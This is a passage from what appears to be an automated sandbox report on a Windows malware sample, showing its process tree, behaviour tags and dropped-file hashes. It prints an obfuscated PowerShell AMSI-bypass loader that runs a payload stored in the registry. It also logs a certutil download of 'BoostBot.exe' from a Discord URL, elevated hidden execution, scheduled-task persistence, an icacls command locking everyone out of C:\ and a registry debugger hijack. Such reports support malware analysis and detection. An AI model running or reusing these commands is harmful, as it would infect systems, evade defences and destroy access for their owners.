@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gSxlObYmava=$ANIcTswqOqUet.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+'o'+'du'+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+'n'+''+[Char](101)+'l32.d'+[Char](108)+''+[Char](108)+'')));$MIVJzSjDJlKlvH=$fUdwnMFTuyiIoO.Invoke($Null,@([Object]$gSxlObYmava,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$yHMxWzUgtulbYZMuB=$fUdwnMFTuyiIoO.Invoke($Null,@([Object]$gSxlObYmava,[Object](''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$bSSISpe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MIVJzSjDJlKlvH,$DPpyMZsWuUiSjMxqfCA).Invoke('ams'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$FxdycOsFgOKDGmLct=$fUdwnMFTuyiIoO.Invoke($Null,@([Object]$bSSISpe,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+'anBu'+[Char](102)+''+[Char](102)+''+'e'+'r')));$qfvPpUWYUO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yHMxWzUgtulbYZMuB,$rIuQYHuUmLYvDHANIzswMn).Invoke($FxdycOsFgOKDGmLct,[uint32]8,4,[ref]$qfvPpUWYUO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FxdycOsFgOKDGmLct,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yHMxWzUgtulbYZMuB,$rIuQYHuUmLYvDHANIzswMn).Invoke($FxdycOsFgOKDGmLct,[uint32]8,0x20,[ref]$qfvPpUWYUO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bPTmLPsZagjG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zInVKazJdwYLDV,[Parameter(Position=1)][Type]$BNJJVSAIPO)$AqIgJPnOqQB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+'l'+'e'+'c'+''+[Char](116)+'ed'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+'m'+'o'+''+'r'+'y'+'M'+'o'+'d'+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType('My'+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'yp'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+','+'A'+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s,'+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$AqIgJPnOqQB.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+'ci'+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+','+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'yS'+[Char](105)+''+[Char](103)+','+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$zInVKazJdwYLDV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'im'+[Char](101)+''+[Char](44)+'M'+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$AqIgJPnOqQB.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ub'+'l'+'i'+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'wS'+'l'+''+[Char](111)+'t,Vir'+[Char](116)+'u'+[Char](97)+''+'l'+'',$BNJJVSAIPO,$zInVKazJdwYLDV).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $AqIgJPnOqQB.CreateType();}$yaJdBlSHKBHWH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'icro'+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+'2.'+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+'N'+'at'+[Char](105)+'ve'+[Char](77)+''+'e'+'t'+'h'+'o'+[Char](100)+'s');$MVwheoEgVVmfdq=$yaJdBlSHKBHWH.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zyfTfYBadUHYnZwICyQ=bPTmLPsZagjG @([String])([IntPtr]);$fFEmyzvkAvvoPGXUQJVAWL=bPTmLPsZagjG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dyYXotiTGnx=$yaJdBlSHKBHWH.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+'a'+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+'d'+'l'+'l')));$FoowQjWPyWbIBw=$MVwheoEgVVmfdq.Invoke($Null,@([Object]$dyYXotiTGnx,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'yA')));$VwuAMkJzEhLEajvty=$MVwheoEgVVmfdq.Invoke($Null,@([Object]$dyYXotiTGnx,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+'o'+'t'+'e'+'c'+'t'+'')));$tdXboHP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FoowQjWPyWbIBw,$zyfTfYBadUHYnZwICyQ).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$hfItXxXHSgwvDUBJT=$MVwheoEgVVmfdq.Invoke($Null,@([Object]$tdXboHP,[Object]('Ams'+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$ahVYWiehQp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VwuAMkJzEhLEajvty,$fFEmyzvkAvvoPGXUQJVAWL).Invoke($hfItXxXHSgwvDUBJT,[uint32]8,4,[ref]$ahVYWiehQp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hfItXxXHSgwvDUBJT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VwuAMkJzEhLEajvty,$fFEmyzvkAvvoPGXUQJVAWL).Invoke($hfItXxXHSgwvDUBJT,[uint32]8,0x20,[ref]$ahVYWiehQp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+'t'+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:236 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1176
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1384
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2084
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2108
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2564
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2932
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer-obf.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\chcp.comchcp.com 4373⤵PID:1008
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\Fixer-obf.bat3⤵PID:1908
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\Fixer-obf.bat3⤵PID:4888
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\Fixer-obf.bat3⤵PID:3336
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\Fixer-obf.bat3⤵PID:2240
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:1428
-
C:\Windows\system32\find.exefind3⤵PID:4620
-
C:\Windows\system32\find.exefind3⤵PID:3104
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:1380
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe3⤵PID:860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:1528 -
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:3992 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "$sxr-powershell" /f6⤵PID:1808
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\12jIxUOHBmVI.bat" "6⤵PID:4984
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1904
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:72
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:4452 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"6⤵
- Executes dropped EXE
PID:1680 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:4520 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
PID:2128 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
PID:3560 -
C:\Windows\system32\icacls.exeicacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T3⤵
- Modifies file permissions
PID:2956 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f3⤵PID:4132
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\Fixer-obf.bat"3⤵
- Views/modifies file attributes
PID:4632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3528
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3952
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:2692
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1084
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1192
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1452
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4148
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1064
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4044
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4680
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5036
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize338B
MD56e5f4bec0ee1414850eae1740e63e13e
SHA10d11cc3ef48d2b5b3aa629c60fc2061ac1a2bbd7
SHA256a55b12d288fd90b3bb5e4674edc50cd5b9217d79479af11a838a742071ba3fb2
SHA51290a7b23be3999bea705cfc65b620cb7298a87c40d007c7e19b46fbde0cb1b68e7c7675db41117083ebec4a37d0cc2e96976ba2d51e9156f4e3d0e06cf41e2807
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E
Filesize556B
MD540f0b14c8f1ff5994c9e4343293ceb63
SHA119f8735f92a5817bd2da3048d03919ad42497288
SHA2562f224cc9743d3ecb72b88e8d2271c0fda6e5ba367c61e9fb4c04b96708bd8399
SHA512da5734cd8e8f9a297f822abb8e22ca15fdf8f62f8b2a5f8eb0e7754bef36957a7c1d0de4d897d362a72a87189d294c18d68bad1d0d0a8d3d79995f7e964b0834
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize408B
MD550703b4a79b16ecbb82e1eca126518c7
SHA18894e959f1cb498759a2803a704bca95f321ba0a
SHA256548e280d80d716776a0bb8c0bdf59c5cfcd29b96448eba77c29016d94bc55929
SHA512ca736dbfbecc4a1bdd2b81ecd9a783317b4449b23a423ec1f19302614b93cd6d1be48d2557c331980c0c21501e909a23abbecf561556378d1586ed1287e0d6a0
-
Filesize
283B
MD5eda09f68f15c108732aa5958cdfb50a2
SHA1fe1b52ce08e0ab25834490f7bccb3d33a00be0ba
SHA2563b01022774a2179b1c5f0368133d209906713bf8f9dcd42e62a8275a1f3c3916
SHA512ccef1d369067bc319cccbd12bce134aaf26ca135f78bd193ce7679cd84b4b6fd2bcd42005941ebd27ec5e3eca858b807c1122ec4212554dad604766eb61a43cf
-
Filesize
409KB
MD5404ab800bbe49c36bd64d0d73600b59a
SHA14c8dff2702fada108f7477ad357067310b584366
SHA2565465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154
SHA512d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
224B
MD5c2f4f8be59f64750a2950361cc69417e
SHA184c5c6d0df8ac9b379f3e8d9185a2044900fcacc
SHA256010aea1f6bfcbf04f2ca34fdb3ac0d689c007663f145ebe26beda33eb11c91fa
SHA5121fb0ffa8e0398495cb3baaeef45f3e06bcbd21c1c0a5c4891db4e545ddc139e86d6429aa8cb37bb704b720c770c226945a499f1629fb9bcc605a203121647a46
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b